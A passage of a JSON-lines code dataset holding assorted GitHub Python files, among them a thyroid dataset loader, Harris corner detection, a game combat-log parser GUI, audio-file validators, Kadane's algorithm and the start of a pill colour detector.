f'{token_hex(9)}.jpg')\n try:\n cv2.imwrite(cropped_image_path, cropped_image)\n except cv2.error:\n continue\n","repo_name":"muladzevitali/cigarette_detection","sub_path":"application/src/scripts/cut_cigarette_packs.py","file_name":"cut_cigarette_packs.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"3293966810","text":"# Реализовать два небольших скрипта:\n# а) итератор, генерирующий целые числа, начиная с указанного,\n# б) итератор, повторяющий элементы некоторого списка, определенного заранее.\n\nfrom itertools import count, cycle\nfrom random import randint\n\nwhile True:\n try:\n smallest_number = int(input('Введите начально целое число меньше 30 для генирации: '))\n break\n except ValueError:\n print('Введите число!')\n\nfor el in count(smallest_number):\n if el > 30:\n break\n else:\n print(el)\n\n# Б\n\nyour_list = input('Введите список элементо через пробел: ').split()\n\nc = 0\nfor el in cycle(your_list):\n if c < 10:\n print(el)\n c += 1\n","repo_name":"visor517/GeekBrains_python","sub_path":"lesson4/task6.py","file_name":"task6.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"73001370239","text":"from typing import Tuple\nfrom typing import Union\n\nimport numpy as np\nimport torch\nfrom torchvision import datasets\nfrom torchvision import transforms\n\nfrom datasets.base import OneClassDataset\nfrom datasets.transforms import OCToFloatTensor2D\nfrom datasets.transforms import ToFloat32\nfrom datasets.transforms import ToFloatTensor2D\nfrom datasets.transforms import ToFloatTensor2Dt\nfrom datasets.transforms import OCToFloatTensor2Dt\nimport scipy.io as io\nimport os\n# thyroid\nclass THYROID (OneClassDataset):\n \n def __init__(self, path):\n\n # type: (str) -> None\n \"\"\"\n Class constructor.\n :param path: The folder in which to download MNIST.\n \"\"\"\n super(THYROID, self).__init__()\n\n self.path = path\n data = io.loadmat(f'{path}/thyroid.mat')\n self.normal_class = 1 \n \n self.name = 'thyroid'\n self.train_split ={}\n self.test_split = {}\n\n features = data['X']\n labels = data['y'].squeeze()\n labels = (labels == 0)\n\n N, self.dimension = features.shape\n \n nominal_data = features[labels==1,:]\n nominal_labels = labels[labels==1]\n\n N_nominal = nominal_data.shape[0]\n\n novel_data = features[labels==0,:]\n novel_labels = labels[labels==0]\n\n N_novel = novel_data.shape[0]\n\n print(f\"thyroid:{N_novel+N_nominal}\\t N_novel:{N_novel}\\tN_nominal:{N_nominal}\\t novel-ratio:{N_novel/N_nominal}\")\n\n\n randIdx = np.arange(N_nominal)\n np.random.shuffle(randIdx)\n \n N_train_valid = N_nominal//2\n N_train = int(N_train_valid *0.9)\n N_valid = N_train_valid -N_train\n\n # 0.45 nominal data as training set\n self.X_train = nominal_data[randIdx[:N_train]]\n self.y_train = nominal_labels[randIdx[:N_train]]\n \n # 0.05 nominal data as validation set\n self.X_val = nominal_data[randIdx[N_train:N_train_valid]]\n self.y_val =nominal_data[randIdx[N_train:N_train_valid]]\n\n # 0.5 nominal data + all novel data as test set\n self.X_test = nominal_data[randIdx[N_train_valid:]]\n self.y_test = nominal_labels[randIdx[N_train_valid:]]\n self.X_test = np.concatenate((self.X_test, novel_data),axis=0)\n self.y_test = np.concatenate((self.y_test, novel_labels),axis=0)\n\n \n print(f\"thyroid: train-{N_train},validation-{N_valid},test-{len(self.y_test)}(novel-ratio:{float(sum(self.y_test == 0)/len(self.y_test))})\")\n\n # Other utilities\n self.mode = None\n self.length = None\n\n # Transform zone\n self.val_transform = transforms.Compose([ToFloatTensor2Dt()])\n self.train_transform = transforms.Compose([ToFloatTensor2Dt()])\n self.test_transform = transforms.Compose([ToFloat32(), OCToFloatTensor2Dt()])\n self.transform = None\n\n def val(self, nominal_class = 1 ):\n # type: (int) -> None\n \"\"\"\n in validation mode.\n :param nominal_class: the class to be considered nominal.\n \"\"\"\n # Update mode, indexes, length and transform \n self.mode = 'val'\n self.length = len(self.y_val)\n self.transform = self.val_transform\n\n def train(self, nominal_class = 1):\n # type: (int) -> None\n \n self.mode = 'train'\n self.length = len(self.y_train)\n # manually shuffled\n randIdx = np.arange(self.length)\n self.X_train = self.X_train[randIdx]\n\n self.transform = self.train_transform\n\n\n\n\n def test(self, nominal_class=1):\n # type: (int) -> None\n \"\"\"\n Sets test mode.\n\n :param nominal_class: the class to be considered nominal.\n :param norvel_ratio: the ratio of novel examples\n \"\"\"\n \n # Update mode, length and transform\n self.mode = 'test'\n\n # testing examples (norm)\n self.length = len(self.y_test)\n self.transform = self.test_transform\n\n\n def __len__(self):\n # type: () -> int\n \"\"\"The size of mini-batches is 1024. The learning rate is $10^{-5}$. The training process is stopped after 100 epochs of non-decreasing loss.\n Returns the number of examples.\n \"\"\"\n return self.length\n\n def __getitem__(self, i):\n # type: (int) -> Tuple[torch.Tensor, Union[torch.Tensor, int]]\n \"\"\"\n Provides the i-th example.\n \"\"\"\n\n if self.mode == 'train':\n x = self.X_train[i]\n x = np.float32(x)[..., np.newaxis]\n sample = x, x\n\n elif self.mode == 'val':\n x = self.X_val[i]\n x = np.float32(x)[..., np.newaxis]\n sample = x, x\n\n elif self.mode == 'test':\n x = self.X_test[i]\n y = self.y_test[i]\n x = np.float32(x)[..., np.newaxis]\n sample = x, y\n\n # Apply transform\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n @property\n def test_classes(self):\n # type: () -> np.ndarray\n \"\"\"\n Returns all test possible test sets (the 10 classes).\n \"\"\"\n return [1]\n\n @property\n def train_classes(self):\n # type: () -> np.ndarray\n \"\"\"\n Returns all test possible test sets (the 10 classes).\n \"\"\"\n return [1]\n\n @property\n def shape(self):\n # type: () -> Tuple[int, int]\n \"\"\"\n Returns the shape of examples.\n \"\"\"\n return 1,6,1\n def __repr__(self):\n return (\"ONE-CLASS MNIST (nominal class = 0 )\")\n","repo_name":"GinGinWang/MTQ","sub_path":"datasets/thyroid.py","file_name":"thyroid.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"97"} +{"seq_id":"11732940700","text":"import unittest\n\nclass TestAddNoCacheHeaders(unittest.TestCase):\n def _callFUT(self, event):\n from karl.handlers import add_no_cache_headers\n return add_no_cache_headers(event)\n\n def test_it_no_header(self):\n headers = []\n response = DummyResponse(headers)\n event = DummyEvent(response)\n self._callFUT(event)\n self.assertEqual(\n headers,\n [('Cache-Control','private, must-revalidate')]\n )\n\n def test_it_with_header(self):\n headers = [('Cache-Control', 'abc')]\n response = DummyResponse(headers)\n event = DummyEvent(response)\n self._callFUT(event)\n self.assertEqual(headers, [('Cache-Control', 'abc')])\n\nclass DummyEvent:\n def __init__(self, response):\n self.response = response\n\nclass DummyResponse:\n def __init__(self, headerlist):\n self.headerlist = headerlist\n \n","repo_name":"karlproject/karl","sub_path":"karl/tests/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"97"} +{"seq_id":"38100500890","text":"from face_recognition import FaceRecognition\n\nfile_path=\"path_of_the_file\"\nkey=\"aws_key\"\nsecret=\"aws_secret\"\ntoken=\"aws_token\"\n\ninstance = FaceRecognition(file_path,key,secret,token)\nresults = instance.detection()\n\nif isinstance(results, dict):\n print(\"The details of the candidate are as follows: \")\n for each_key in results.keys():\n print(each_key + '=' + str(results[each_key]))\n\nelse:\n print(results)","repo_name":"suyojman/genese_assignment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"30574303177","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\nfrom .utils import compute_gradient\n\n\ndef NMS(img: np.ndarray):\n \"\"\"\n 9-point NMS\n \"\"\"\n H, W = img.shape\n center_x, center_y = np.meshgrid(np.arange(W), np.arange(H))\n top = np.clip(center_y - 1, 0, H - 1)\n bottom = np.clip(center_y + 1, 0, H - 1)\n left = np.clip(center_x - 1, 0, W - 1)\n right = np.clip(center_x + 1, 0, W - 1)\n\n row_iters = [top, center_y, bottom]\n col_iters = [left, center_x, right]\n mask = np.ones_like(img, dtype=bool)\n\n for i, row_iter in enumerate(row_iters):\n for j, col_iter in enumerate(col_iters):\n if i == 1 and j == 1:\n continue\n mask &= (img[center_y, center_x] > img[row_iter, col_iter])\n\n return mask\n\n\ndef compute_features(img: np.ndarray, win_size=11, min_eig_th=0.05, border=20, max_num_pts=1000,\n min_dist_pix=10, if_show=False, if_return_st=False, **kwargs):\n \"\"\"\n Returns\n -------\n x, y: np.ndarray\n Locations of features in xy-coordinate, of shape (N,)\n structure_tensor: np.ndarray\n [Ix, Iy, Ixx, Iyy, Ixy] if specifies \"if_return_st = True\", otherwise this is not returned\n \"\"\"\n H, W = img.shape\n Ix, Iy = compute_gradient(img)\n Ixx = cv2.GaussianBlur(Ix ** 2, (win_size, win_size), sigmaX=0)\n Iyy = cv2.GaussianBlur(Iy ** 2, (win_size, win_size), sigmaX=0)\n Ixy = cv2.GaussianBlur(Ix * Iy, (win_size, win_size), sigmaX=0)\n\n trace = Ixx + Iyy\n det = Ixx * Iyy - Ixy ** 2\n diff_half = np.sqrt((trace / 2) ** 2 - det)\n quality = np.minimum(np.abs(trace / 2 + diff_half), np.abs(trace / 2 - diff_half)) # lambda1 or lambda2\n\n mask_border = np.zeros_like(img, dtype=bool)\n mask_border[border : H - border, border : W - border] = True\n quality *= mask_border\n mask_thresh = (quality > min_eig_th * np.max(quality))\n quality *= mask_thresh\n mask_nms = NMS(quality)\n quality *= mask_nms\n\n quality_flatten = quality.ravel()\n inds = np.argsort(quality_flatten, axis=-1)[::-1]\n inds = inds[:min(len(inds), max_num_pts)]\n ind_rows, ind_cols = np.unravel_index(inds, img.shape)\n\n # filter by min dist\n num_features = len(ind_rows)\n pts = np.concatenate([ind_cols.reshape((1, -1)), ind_rows.reshape((1, -1))], axis=0) # (2, N)\n pts_norm_sq = np.linalg.norm(pts, axis=0) ** 2 # (N,)\n D = np.tile(pts_norm_sq.reshape((-1, 1)), (1, num_features)) + \\\n np.tile(pts_norm_sq.reshape((1, -1)), (num_features, 1)) - 2 * pts.T @ pts # (N, N)\n D -= min_dist_pix ** 2\n D = np.tril(D, k=-1)\n D_sum = D.sum(axis=1) # (N,)\n inds_sel = np.argwhere(D_sum >= 0)\n ind_rows, ind_cols = ind_rows[inds_sel], ind_cols[inds_sel]\n\n if if_show:\n img_copy = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img_copy = (img_copy * 255).astype(np.uint8)\n for x, y in zip(ind_cols, ind_rows):\n img_copy = cv2.drawMarker(img_copy, (x, y), color=(0, 0, 255), markerSize=kwargs.get(\"markerSize\", 10),\n thickness=kwargs.get(\"thickness\", 2), line_type=cv2.LINE_AA)\n\n plt.imshow(cv2.cvtColor(img_copy, cv2.COLOR_BGR2RGB))\n plt.show()\n\n ind_cols = ind_cols.ravel()\n ind_rows = ind_rows.ravel()\n\n if if_return_st:\n return ind_cols, ind_rows, [Ix, Iy, Ixx, Iyy, Ixy]\n\n return ind_cols, ind_rows\n","repo_name":"10258392511/ImageAnalysis","sub_path":"3DVision/3d_ch4/helpers/harris_corner.py","file_name":"harris_corner.py","file_ext":"py","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"1486359483","text":"import threading\nimport time\nimport psutil\nimport os\nimport sys\n# UI Libraries\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\n# Project Modules\nfrom network.discord import DiscordClient\nfrom parsing.realtime import RealTimeParser\nfrom toplevels.minimap import MiniMap\nfrom widgets.events import EventOverlay\nfrom utils.swtor import get_swtor_screen_mode\nfrom utils.admin import check_privileges\nfrom widgets.results.time_view import TimeView\nfrom variables import settings\n\n\nclass RealTimeFrame(ttk.Frame):\n \"\"\"\n A Frame that contains all the necessary widgets to control a\n RealTimeParser instance.\n \"\"\"\n\n DATA_STR_BASE = \"Slow screen results features:\\n\\n{}\"\n\n def __init__(self, master, window):\n ttk.Frame.__init__(self, master)\n \"\"\"\n Attributes \n \"\"\"\n self.window = window\n self.after_id = None\n self._rtp_id = None\n self.parser = None\n self.overlay = None\n self.overlay_after_id = None\n self.data_after_id = None\n self._event_overlay = None\n\n # Watching Label\n self.watching_stringvar = tk.StringVar(self, value=\"Watching no file...\")\n self.watching_label = ttk.Label(self, textvariable=self.watching_stringvar, justify=tk.LEFT)\n self.cpu_stringvar = tk.StringVar()\n self.cpu_label = ttk.Label(self, textvariable=self.cpu_stringvar, justify=tk.LEFT, font=\"TkFixedFont\")\n\n # Control widgets\n servers = (\"Choose Server\",) + tuple(self.window.characters_frame.servers.values())\n self.server, self.character = tk.StringVar(), tk.StringVar()\n self.server_dropdown = ttk.OptionMenu(self, self.server, *servers, command=self.update_characters)\n self.character_dropdown = ttk.OptionMenu(self, self.character, *(\"Choose Character\",))\n self.parsing_control_button = ttk.Button(self, text=\"Start Parsing\", command=self.start_parsing, width=20)\n\n # Data widgets\n self.data = tk.StringVar(value=self.DATA_STR_BASE.format(\"Not real-time parsing\\n\"))\n self.data_label = ttk.Label(\n self, textvariable=self.data, font=(\"Consolas\", 9), justify=tk.LEFT,\n wraplength=300)\n self.time_view = TimeView(self, height=6, width=1.5)\n self.time_scroll = ttk.Scrollbar(self, command=self.time_view.yview)\n self.time_view.config(yscrollcommand=self.time_scroll.set)\n\n # MiniMap widgets\n self.minimap_enabled = tk.BooleanVar()\n self.minimap_checkbox = ttk.Checkbutton(self, text=\"MiniMap Location Sharing\", variable=self.minimap_enabled)\n self.minimap_address = tk.StringVar(self, \"Address : Port\")\n self.minimap_name = tk.StringVar(self, \"Username\")\n self.minimap_name_entry = ttk.Entry(self, width=25, textvariable=self.minimap_name)\n self.minimap_address_entry = ttk.Entry(self, width=25, textvariable=self.minimap_address)\n self.minimap = None\n\n # Start monitoring CPU usage\n self.process = psutil.Process(os.getpid())\n self.after(1000, self.update_cpu_usage)\n\n def grid_widgets(self):\n \"\"\"Put all widgets into place\"\"\"\n self.server_dropdown.grid(row=0, column=0, sticky=\"nswe\", padx=5, pady=5)\n self.character_dropdown.grid(row=1, column=0, sticky=\"nswe\", padx=5, pady=(0, 5))\n self.parsing_control_button.grid(row=2, column=0, sticky=\"nswe\", padx=5, pady=5)\n\n self.minimap_checkbox.grid(row=0, column=1, sticky=\"nsw\", padx=5, pady=5)\n self.minimap_name_entry.grid(row=1, column=1, sticky=\"nsw\", padx=5, pady=(0, 5))\n self.minimap_address_entry.grid(row=2, column=1, sticky=\"nsw\", padx=5, pady=5)\n\n self.data_label.grid(row=0, column=2, rowspan=3, columnspan=2, sticky=\"nwe\", padx=(0, 5), pady=5)\n self.time_view.grid(row=3, column=0, columnspan=4, sticky=\"nswe\", padx=5, pady=5)\n\n self.watching_label.grid(row=4, column=0, columnspan=4, sticky=\"nw\", padx=5, pady=5)\n self.cpu_label.grid(row=4, column=2, sticky=\"nw\", padx=5, pady=5)\n\n def check_parser_start(self) -> bool:\n \"\"\"Check if a RealTimeParser can be started\"\"\"\n if self.character_data is None:\n messagebox.showinfo(\"Info\", \"Please select a valid character using the dropdowns.\")\n return False\n if settings[\"overlay\"][\"enabled\"] or settings[\"screen\"][\"enabled\"]:\n if get_swtor_screen_mode() is False:\n return False\n if \"Mouse and Keyboard\" in settings[\"screen\"][\"features\"] and sys.platform != \"linux\":\n if not check_privileges():\n messagebox.showinfo(\n \"Info\", \"Mouse and keyboard results is enabled, but the GSF Parser is not running as \"\n \"administrator, which prevents reading input from the SWTOR window. Please restart the \"\n \"GSF Parser as administrator for this feature to work.\")\n return True\n\n def start_parsing(self):\n \"\"\"Start the results process and open the Overlay\"\"\"\n if self.check_parser_start() is False:\n return\n self.parsing_control_button.config(state=tk.DISABLED)\n self.parsing_control_button.update()\n # Setup attributes\n args = (self.window.characters_frame.characters, self.character_data,\n self.window.builds_frame.ships_data, self.window.builds_frame.companions_data)\n # Create MiniMap window\n if self.minimap_enabled.get() is True:\n self.minimap = MiniMap(self.window)\n # Generate kwargs\n kwargs = {\n \"spawn_callback\": self.spawn_callback,\n \"match_callback\": self.match_callback,\n \"file_callback\": self.file_callback,\n \"event_callback\": self.event_callback,\n \"minimap_share\": self.minimap_enabled.get(),\n \"minimap_user\": self.minimap_name.get(),\n \"minimap_address\": self.minimap_address.get(),\n \"minimap_window\": self.minimap,\n \"rpc\": self.window.rpc,\n }\n try:\n self.parser = RealTimeParser(*args, **kwargs)\n except Exception as e:\n messagebox.showerror(\n \"Error\",\n \"An error occurred during the initialization of the RealTimeParser. Please report the error given \"\n \"below, as well as, if possible, the full stack-trace to the developer.\\n\\n{}\".format(e))\n raise\n # Change Button state\n self.parsing_control_button.config(text=\"Stop Parsing\", command=self.stop_parsing)\n self.watching_stringvar.set(\"Waiting for a CombatLog...\")\n self.open_overlay()\n self.open_event_overlay()\n self.update_data_string()\n # Start the parser\n self.parser.start()\n self._rtp_id = self.after(100, self.check_alive)\n self.data_after_id = self.after(1000, self.update_data_string)\n self.parsing_control_button.config(state=tk.NORMAL)\n print(\"[RealTimeFrame] Parsing started. Threads: {}\".format(threading.enumerate()))\n\n def stop_parsing(self):\n \"\"\"Stop the results process\"\"\"\n if self.parser._scoreboard_parser is not None:\n messagebox.showwarning(\"Warning\", \"Parsing cannot be stopped while results a scoreboard.\")\n return\n self.parsing_control_button.config(state=tk.DISABLED)\n self.parsing_control_button.update()\n if self.minimap_enabled.get() is True and self.minimap is not None:\n self.minimap.destroy()\n self.close_overlay()\n self.parser.stop()\n self.parsing_control_button.config(text=\"Start Parsing\", command=self.start_parsing)\n time.sleep(0.1)\n try:\n self.parser.join(timeout=2)\n except Exception as e:\n messagebox.showerror(\"Error\", \"While real-time parsing, the following error occurred:\\n\\n{}\".format(e))\n raise\n self.watching_stringvar.set(\"Watching no file...\")\n print(\"[RealTimeFrame] RealTimeParser reference count: {}\".format(sys.getrefcount(self.parser)))\n self.parser = None\n self.close_overlay()\n DiscordClient().send_recent_files(self.window)\n self.window.update_presence()\n self.parsing_control_button.config(state=tk.NORMAL)\n self.data.set(self.DATA_STR_BASE.format(\"Not real-time parsing\\n\"))\n\n def file_callback(self, file_name):\n \"\"\"LogStalker new file callback to set file name in label\"\"\"\n print(\"[RealTimeParser] New file {}\".format(file_name))\n self.watching_stringvar.set(\"Watching: {}\".format(file_name))\n\n def match_callback(self, match: bool=False):\n \"\"\"Callback for the RealTimeParser to clear the TimeView\"\"\"\n self.time_view.delete_all()\n\n def spawn_callback(self):\n \"\"\"Callback for the RealTimeParser to clear the TimeView\"\"\"\n self.time_view.delete_all()\n\n def event_callback(self, event, player_name, active_ids, start_time):\n \"\"\"RealTimeParser event callback for TimeView insertion\"\"\"\n self.time_view.insert_event(event, player_name, active_ids, start_time)\n self.time_view.yview_moveto(1.0)\n if self._event_overlay is not None:\n self._event_overlay.process_event(event, active_ids)\n\n def update_cpu_usage(self):\n \"\"\"Update the CPU usage Label every two seconds\"\"\"\n string = \"CPU: {:4.1f}%\".format(self.process.cpu_percent())\n assert isinstance(self.process, psutil.Process)\n memory = self.process.memory_full_info().rss / 1024 ** 2\n string += \", Memory: {:5.1f}MiB\".format(memory)\n self.after(2000, self.update_cpu_usage)\n if self.parser is not None and self.parser.diff is not None:\n diff = self.parser.diff\n string += \", Cycle Time: {:.03f}s\".format(diff.total_seconds())\n else:\n string += \", Cycle Time: -.---s\"\n self.cpu_stringvar.set(string)\n\n def open_overlay(self):\n \"\"\"Open an overlay if the settings given by the user allow for it\"\"\"\n if settings[\"overlay\"][\"enabled\"] is False:\n return\n from widgets.overlays import Overlay\n # Generate arguments for Overlay.__init__\n position = settings[\"overlay\"][\"position\"]\n x, y = position.split(\"y\")\n x, y = int(x[1:]), int(y)\n self.overlay = Overlay((x, y), master=self.window)\n self.update_overlay()\n\n def open_event_overlay(self):\n \"\"\"Open an EventOverlay if it is enabled in settings\"\"\"\n if settings[\"event\"][\"enabled\"] is False:\n return\n x, y = settings[\"event\"][\"position\"].split(\"y\")\n x, y = int(x[1:]), int(y)\n self._event_overlay = EventOverlay(self.window, location=(x, y))\n\n def update_data_string(self):\n \"\"\"Update the string in the data label with the parser stats\"\"\"\n if self.parser is None:\n if self.data_after_id is not None:\n self.after_cancel(self.data_after_id)\n self.data_after_id = None\n return\n if settings[\"screen\"][\"perf\"] is False:\n string = self.DATA_STR_BASE.format(\"Screen parsing performance profiling disabled\\n\")\n self.data.set(string)\n return\n perf = self.parser.perf_string\n self.data_after_id = self.after(1000, self.update_data_string)\n if perf is None:\n return\n elif len(perf) == 0:\n string = self.DATA_STR_BASE.format(\"No slow screen parsing features\\n\")\n else:\n string = self.DATA_STR_BASE.format(perf)\n self.data.set(string)\n\n def update_overlay(self):\n \"\"\"Update the Overlay with the text from the RealTimeParser\"\"\"\n if self.parser is None or not isinstance(self.parser, RealTimeParser):\n print(\"[RealTimeFrame] Cancelling Overlay update.\")\n return\n string = self.parser.overlay_string\n if string is not None:\n self.overlay.update_text(string)\n self.overlay.update_disabled(self.parser.disabled_string)\n if self._event_overlay is not None:\n assert isinstance(self._event_overlay, EventOverlay)\n self._event_overlay.update_events()\n self.overlay_after_id = self.after(100, self.update_overlay)\n\n def close_overlay(self):\n \"\"\"Close the overlay\"\"\"\n if self.overlay_after_id is not None:\n self.after_cancel(self.overlay_after_id)\n if self.overlay is not None:\n self.overlay.destroy()\n self.overlay = None\n self.overlay_after_id = None\n if self._event_overlay is not None:\n self._event_overlay.destroy()\n self._event_overlay = None\n\n def update_characters(self, *args):\n \"\"\"Update the characters shown in the character dropdown\"\"\"\n if len(args) == 0:\n return\n server = args[0]\n if \"Choose\" in server:\n return\n self.character_dropdown[\"menu\"].delete(0, tk.END)\n characters = [\"Choose Character\"]\n if server not in self.window.characters_frame.servers.values():\n return\n for data in self.window.characters_frame.characters:\n character_server = self.window.characters_frame.servers[data[0]]\n if character_server != server:\n continue\n characters.append(data[1])\n for character in sorted(characters):\n self.character_dropdown[\"menu\"].add_command(\n label=character, command=lambda value=character: self.character.set(value))\n\n @property\n def character_data(self):\n \"\"\"Return Character Data tuple for selected character or None\"\"\"\n if \"Choose\" in self.server.get() or \"Choose\" in self.character.get():\n return None\n reverse_servers = {value: key for key, value in self.window.characters_frame.servers.items()}\n server = reverse_servers[self.server.get()]\n return server, self.character.get()\n\n def check_alive(self):\n \"\"\"Check if the RealTimeParser is still alive\"\"\"\n if self.parser is None:\n self._rtp_id = None\n return\n if self.parser.is_alive() is False:\n self.stop_parsing()\n return\n self._rtp_id = self.after(100, self.check_alive)\n","repo_name":"RedFantom/gsf-parser","sub_path":"frames/realtime.py","file_name":"realtime.py","file_ext":"py","file_size_in_byte":14318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"7606558677","text":"def largest_continuous_sum(array: list) -> int:\n max_sum = 0\n max_start = None\n max_end = None\n\n for window_size in range(1, len(array)):\n for i in range(len(array)):\n start = i\n end = i + window_size\n if end <= len(array):\n s = sum(array[start:end])\n if s > max_sum:\n max_sum = s\n max_start = start\n max_end = end\n else:\n pass\n\n print(f\"sum(array[{max_start},{max_end}] = {max_sum}\")\n return max_sum\n\n\ndef kadane_algorithm(array: list) -> int:\n if len(array) == 0:\n return 0\n\n max_sum = current_sum = array[0]\n\n for number in array[1:]:\n current_sum = max(current_sum, current_sum + number)\n max_sum = max(max_sum, current_sum)\n\n return max_sum\n\n\ndef kadane_algorithm_with_bounds(array: list) -> float:\n if len(array) == 0:\n return 0\n\n max_so_far = float('-inf')\n max_ending_here = 0\n start = 0\n end = 0\n s = 0\n\n for i in range(len(array)):\n max_ending_here += array[i]\n\n if max_so_far < max_ending_here:\n max_so_far = max_ending_here\n start = s\n end = i\n\n if max_ending_here < 0:\n max_ending_here = 0\n s = i + 1\n\n print(f\"sum(array[{start},{end}] = {max_so_far}\")\n return max_so_far\n\n\nif __name__ == \"__main__\":\n from nose.tools import assert_equal\n\n\n class LargeContTest(object):\n def test(self, sol):\n assert_equal(sol([1, 2, -1, 3, 4, -1]), 9)\n assert_equal(sol([1, 2, -1, 3, 4, 10, 10, -10, -1]), 29)\n assert_equal(sol([-1, 1]), 1)\n print('ALL TEST CASES PASSED')\n\n\n # Run Test\n t = LargeContTest()\n t.test(kadane_algorithm_with_bounds)\n","repo_name":"b1ck0/python_coding_problems","sub_path":"Sequences/005_largest_continuous_sum.py","file_name":"005_largest_continuous_sum.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"30836416858","text":"import os\nimport re\nimport py_file_type as magic\nfrom audio_extract import utils\nfrom audio_extract.exceptions import AudioExtractException\n\n\ndef is_valid_hms(time: str) -> bool:\n if type(time) is not str:\n return False\n # Pattern to match HH:MM:SS or MM:SS\n pattern = r\"^(?:(?:[0-1]\\d|2[0-3]):[0-5]\\d:[0-5]\\d|(?:(?:[0-5]?\\d):)?[0-5]\\d)$\"\n # Check if the time string matches the pattern\n match = re.match(pattern, time)\n # Return True if match is found, False otherwise\n return match is not None\n\n\ndef extract_full_audio_validation(path: str, start_time: str) -> bool:\n if not os.path.exists(path):\n raise AudioExtractException(f\"{path} was not found.\")\n\n valid_media = ('video/mp4', 'audio/mpeg')\n type_check = magic.from_file(path, mime=True)\n if type_check not in valid_media:\n raise AudioExtractException(f\"Invalid input file, {type_check} doesn't match video/audio media.\")\n\n if not is_valid_hms(start_time):\n raise AudioExtractException(f\"Invalid start time format, valid formats are \\\"HH:MM:SS\\\" or \\\"MM:SS\\\".\")\n\n media_duration = utils.media_duration(path)\n formatted_media_duration = utils.seconds_to_hms(media_duration)\n\n start_time_seconds = utils.hms_to_seconds(start_time)\n if start_time_seconds > media_duration:\n raise AudioExtractException(\n f\"Start time can't be bigger than input file duration \\\"{formatted_media_duration}\\\".\")\n\n return True\n\n\ndef extract_sub_audio_validation(path: str, start_time: str, duration: str) -> bool:\n if not os.path.exists(path):\n raise AudioExtractException(f\"{path} was not found.\")\n\n type_check = magic.from_file(path, mime=True)\n if 'audio' not in type_check and 'video' not in type_check:\n raise AudioExtractException(f\"Invalid input file, {type_check} doesn't match video/audio media.\")\n\n if not is_valid_hms(start_time):\n raise AudioExtractException(f\"Invalid start time format, valid formats are \\\"HH:MM:SS\\\" or \\\"MM:SS\\\".\")\n\n if not is_valid_hms(duration):\n raise AudioExtractException(f\"Invalid duration format, valid formats are \\\"HH:MM:SS\\\" or \\\"MM:SS\\\".\")\n\n file_duration_seconds = utils.media_duration(path)\n formatted_media_duration = utils.seconds_to_hms(file_duration_seconds)\n\n start_time_seconds = utils.hms_to_seconds(start_time)\n if start_time_seconds > file_duration_seconds:\n raise AudioExtractException(\n f\"Start time can't be bigger than input file duration \\\"{formatted_media_duration}\\\".\")\n\n duration_seconds = utils.hms_to_seconds(duration)\n if duration_seconds > (file_duration_seconds - start_time_seconds):\n raise AudioExtractException(\n f\"Invalid duration, new duration can't exceed file duration.\")\n\n return True\n","repo_name":"konichiwa55115/audio-extract","sub_path":"audio_extract/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"97"} +{"seq_id":"74608376640","text":"import sys\nstring = list(sys.stdin.readline().rstrip())\nwhile string[0] != '.' :\n stack = []\n for i in string :\n if len(stack) > 0 and stack[-1] == '(' and i == ')' :\n stack.pop()\n elif len(stack) > 0 and stack[-1] == '[' and i == ']' :\n stack.pop()\n elif i == '(' or i == '[' or i == ']' or i == ')' :\n stack.append(i)\n if len(stack) == 0 :\n print('yes')\n else :\n print('no')\n string = list(sys.stdin.readline().rstrip())\n stack = []","repo_name":"theunghee02/CodeTIL","sub_path":"승희/BaekJoon/스택, 큐, 덱/4949.py","file_name":"4949.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"117297428","text":"import numpy as np\nfrom tensorflow import keras\nimport cv2\nfrom custom_socket import CustomSocket\nimport json\nimport traceback\n\nwtf_color_model = keras.models.load_model(\"model\\wtf_color_det\")\nwtf_shape_model = keras.models.load_model(\"model\\wtf_shape_det\")\nCOLOR_LIST = (\"blue\", \"red\", \"yellow\", \"purple\", \"green\", \"orange\", \"pink\", \"wine\", \"mint\", \"none\")\nSHAPE_LIST = (\"circle\", \"hex\", \"pill\", \"pie\", \"none\")\n\n\ndef get_center_list(f_w, f_h, nw, nh):\n l = []\n for h in range(nh):\n for w in range(nw):\n l += [(int(w / nw * f_w + f_w / nw / 2), int(h / nh * f_h + f_h / nh / 2))]\n\n return l\n\n\ndef get_start_point_list(f_w, f_h, nw, nh):\n l = []\n for h in range(nh):\n for w in range(nw):\n l += [(int(w / nw * f_w), int(h / nh * f_h))]\n\n return l\n\n\ndef draw_grid(pic, w, h, color, thickness):\n ph, pw, _ = pic.shape\n for i in range(1, h):\n cv2.line(pic, (0, int(ph * i / h)), (pw, int(ph * i / h)), color, thickness)\n for i in range(1, w):\n cv2.line(pic, (int(pw * i / w), 0), (int(pw * i / w), ph), color, thickness)\n\n\ndef draw_circle(pic, center_list, radius, color, thickness):\n for center in center_list:\n cv2.circle(pic, center, radius, color, thickness)\n\n\ndef draw_points(pic, center, d, color):\n cx, cy = center\n\n pic[cy, cx] = color\n pic[cy - d, cx] = color\n pic[cy + d, cx] = color\n pic[cy, cx - d] = color\n pic[cy, cx + d] = color\n\n\ndef get_color_data(pic, center, d):\n # dl = []\n 